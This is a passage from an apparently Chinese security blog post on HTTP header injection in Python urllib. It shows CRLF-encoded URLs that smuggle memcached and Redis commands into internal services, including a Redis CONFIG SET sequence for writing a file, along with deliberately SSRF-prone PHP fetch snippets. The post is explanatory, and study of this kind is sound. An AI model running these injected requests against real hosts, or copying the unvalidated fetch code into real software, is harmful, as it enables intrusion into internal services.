KK9pK3ZRKbWh6EDBOGvHc36d/Lm67YETjkbYbOzGJ0VgIKrtPSUC1bBQNthDe1CvKbFJWfxDrzlL5XcNW18nY8YnFVSaDJPCXy/jKOG22EzixjdOZdrmZN64m8mbw8kpynnY6NECtW3M8VxHdtGJeUXnkXbhZcdUravMnuRzynTos3UtbKo3e+L0PwTXHIB54+oFdt+9S5T6LmCGuVvGX0wY7wpsuRlbOzdBHhbPPgqnPOHnm7HrGwtZayZRYa3xepkzKNDs1XdBI/Kg+PWO2bWWpEI41qXU+E0O1MWVK6fTnF/fScvuEV1R+xLNxMWSkPZR+Bo540K+7MEJ5hHMN4H0IYtp0eNQ21goG2I5ytMOUngqv66XjE6oduaxh7H8RSecsYnVGPy9XzX9E5D3GAwCiooBj9dsnbZ1LH2NvWZ226aZPgqv4r6njEN1lnjJQWyPsgHPXErGRRnyyedZmEvpGWSit02fHRdO66Q95D8FnUMXNulL5/cNUo1w0fsd3TcPbMb3z3Po7PYzn77d64O2pAs7I3rFoDAcIDuB5qUQsAAAAAAADA71J+3Lk1v0KJcfEQktVk8YImxtAAXyVf4B1/1n7/MATDw+P1WwjxEmUkDXAabEXqBQlJ+iE8w5B6ICBvgOMxljS1F3jnR+N1a9l6yqRzznIGgKPok3e2YnPSrViv6MsBAA5HibOyinyaSJu77rX2H30DfBHp0VsbQL9Em+8TpKbJkTfAQbg650rb8cS5SjDnkKSkcw5wGKW80xZ4ct3Ojt1aM2aZiyFTawAAAAAAAAAAAAAAS/nOJtjlvukAv03Np/OQ0k8nJbZ0g2uQLkZpb069hwGnkxLyhktgrA41NuvOw0fKg8n5+a77ybKW1lKZIoSVw6Q+1EblNyVvtcGF0euhgw8nQTedRqiNMnykPGhEilQxPWwT8rG326Q5+bIwI8UPtdLL+KS9UTIB9kP2Qq1AWfXwkfWYknZVd8nbb9KcfkUEO5GbLF061PVGyQTYCUve9VByzYNpnzsPc2mXlh42hLJV3M+K+Ep5y4LKbri8doAvocbeVmO1QPMyz+KX5a33Snmvab1letprOBVq5twYarrbTxkpsjL2NjZuc4y9LXmvHHuroXxZuopP2hslE2BnxAywMU3t7h7LTZONaeo8zGVrPr1uUlSUQ1qWSZMR8e6wlZnzYlqPnjkAAAAAAAAAAAAAAAAAAABAB3+Ms852IowkuAAAAABJRU5ErkJggg==" alt="" />

0x2: Attacking memcached

类似于通过SSRF注入memcache,http header injection同样可以劫持server端,向内网的redis、memcache应用发起TCP请求,实现内网渗透的效果
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL

./fetch.py http://114.215.190.203%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:12345/foo

aaarticlea/png;base64,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" alt="" />

the above lines in light of memcached protocol syntax, most of the above syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):

ERROR

ERROR

ERROR

ERROR

ERROR

STORED

ERROR

ERROR

0x3: Attacking Redis

./fetch.py http://114.215.190.203%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo

Relevant Link:

http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html

4.  其他场景

0x1: PHP URL解析库

1. CURL

<?php

    if (isset($_GET['url']))

    {

        $link = $_GET['url'];

        $curlobj = curl_init();

        curl_setopt($curlobj, CURLOPT_POST, );

        curl_setopt($curlobj,CURLOPT_URL,$link);

        curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, );

        $result=curl_exec($curlobj);

        curl_close($curlobj);

        echo $result;

    }

?>

2. file_get_contents

<?php

    $url = $_GET['url'];

    $content = file_get_contents($url);

    echo $content;

?>

3. fsocket

PHP的URL解析相关库在发起URL远程请求前,会对参数进行敏感字符过滤

5. 防护/缓解手段

PHP header()函数中提到了:
从 PHP 4.4 之后,该函数防止一次发送多个报头。这是对头部注入攻击的保护措施

Relevant Link:

http://php.net/manual/en/function.header.php

Copyright (c) 2016 LittleHann All rights reserved

HTTP Header Injection in Python urllib的更多相关文章

  1. python urllib模块的urlopen()的使用方法及实例

    Python urllib 库提供了一个从指定的 URL 地址获取网页数据,然后对其进行分析处理,获取想要的数据. 一.urllib模块urlopen()函数: urlopen(url, data=N ...

  2. Python urllib和urllib2模块学习(一)

    (参考资料:现代魔法学院 http://www.nowamagic.net/academy/detail/1302803) Python标准库中有许多实用的工具类,但是在具体使用时,标准库文档上对使用 ...

  3. python urllib和urllib2 区别

    python有一个基础的库叫httplib.httplib实现了HTTP和HTTPS的客户端协议,一般不直接使用,在python更高层的封装模块中(urllib,urllib2)使用了它的http实现 ...

  4. Python urllib urlretrieve函数解析

    Python urllib urlretrieve函数解析 利用urllib.request.urlretrieve函数下载文件 觉得有用的话,欢迎一起讨论相互学习~Follow Me 参考文献 Ur ...

  5. Python:urllib和urllib2的区别(转)

    原文链接:http://www.cnblogs.com/yuxc/ 作为一个Python菜鸟,之前一直懵懂于urllib和urllib2,以为2是1的升级版.今天看到老外写的一篇<Python: ...

  6. bWAPP----Mail Header Injection (SMTP)

    Mail Header Injection (SMTP) 本地没有搭环境,没法演示,附上转载的 https://www.acunetix.com/blog/articles/email-header- ...

  7. mail Header Injection Exploit

    Preventing Email Header Injection - PHundamental PHP Best Practices - http://nyphp.org/phundamentals ...

  8. python urllib urllib2

    区别 1) urllib2可以接受一个Request类的实例来设置URL请求的headers,urllib仅可以接受URL.这意味着,用urllib时不可以伪装User Agent字符串等. 2) u ...

  9. python urllib模块

    1.urllib.urlopen(url[,data[,proxies]]) urllib.urlopen(url[, data[, proxies]]) :创建一个表示远程url的类文件对象,然后像 ...

随机推荐

  1. sublime配置文件

    起初是为了解决 tab转四个空格问题 安装包 Sublime_Text_Build_3103_x64_CHS_Lfqy.exe 配置方法 配置脚本 { "bold_folder_labels ...

  2. C#:DataTable映射成Model

    这是数据库开发中经常遇到的问题,当然,这可以用现成的ORM框架来解决,但有些时候,如果DataSet/DataTable是第三方接口返回的,ORM就不方便了,还得自己处理. 反射自然必不可少的,另外考 ...

  3. express:webpack dev-server开发中如何调用后端服务器的接口?

    开发环境:     前端:webpack + vue + vue-resource,基于如下模板创建的开发环境: https://github.com/vuejs-templates/webpack  ...

  4. c# 调用win32模拟点击的两种方法

    第一种 using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; ...

  5. Eclipse 反编译插件JadClipse安装

    下载jadClipse地址: 链接: http://pan.baidu.com/s/1kTN4TPd  提取码: 3fvd 将net.sf.jadclipse_3.3.0.jar拷贝到eclipse的 ...

  6. 继续node爬虫 — 百行代码自制自动AC机器人日解千题攻占HDOJ

    前言 不说话,先猛戳 Ranklist 看我排名. 这是用 node 自动刷题大概半天的 "战绩",本文就来为大家简单讲解下如何用 node 做一个 "自动AC机&quo ...

  7. mvc5+ef6+Bootstrap 项目心得--WebGrid

    1.mvc5+ef6+Bootstrap 项目心得--创立之初 2.mvc5+ef6+Bootstrap 项目心得--身份验证和权限管理 3.mvc5+ef6+Bootstrap 项目心得--WebG ...

  8. 误人子弟的网络,谈谈HTTP协议中的短轮询、长轮询、长连接和短连接

    引言 最近刚到公司不到一个月,正处于熟悉项目和源码的阶段,因此最近经常会看一些源码.在研究一个项目的时候,源码里面用到了HTTP的长轮询.由于之前没太接触过,因此LZ便趁着这个机会,好好了解了一下HT ...

  9. HTML5之CSS3 3D transform 剖析式学习之一

    最近坐地铁发现“亚洲动物基金”在地铁上做了很多公益广告,比较吸引人的是一个月熊的广告.做的很可爱.回去就搜了一下,发现这个网站是HTML5做的,非常炫. 所以想学习一下,方法就是传统的学习办法,模仿. ...

  10. floyd原理以及求最小环

    floyd这个东西学会了好久了,但是原理总是忘记,或者说没有真正的明白,这里在说一下. 我们要求的是任意的 i,j 之间的最短路径,用动态规划的思想来解决就是f[i,j,k]表示i到j中间节点不超过k ...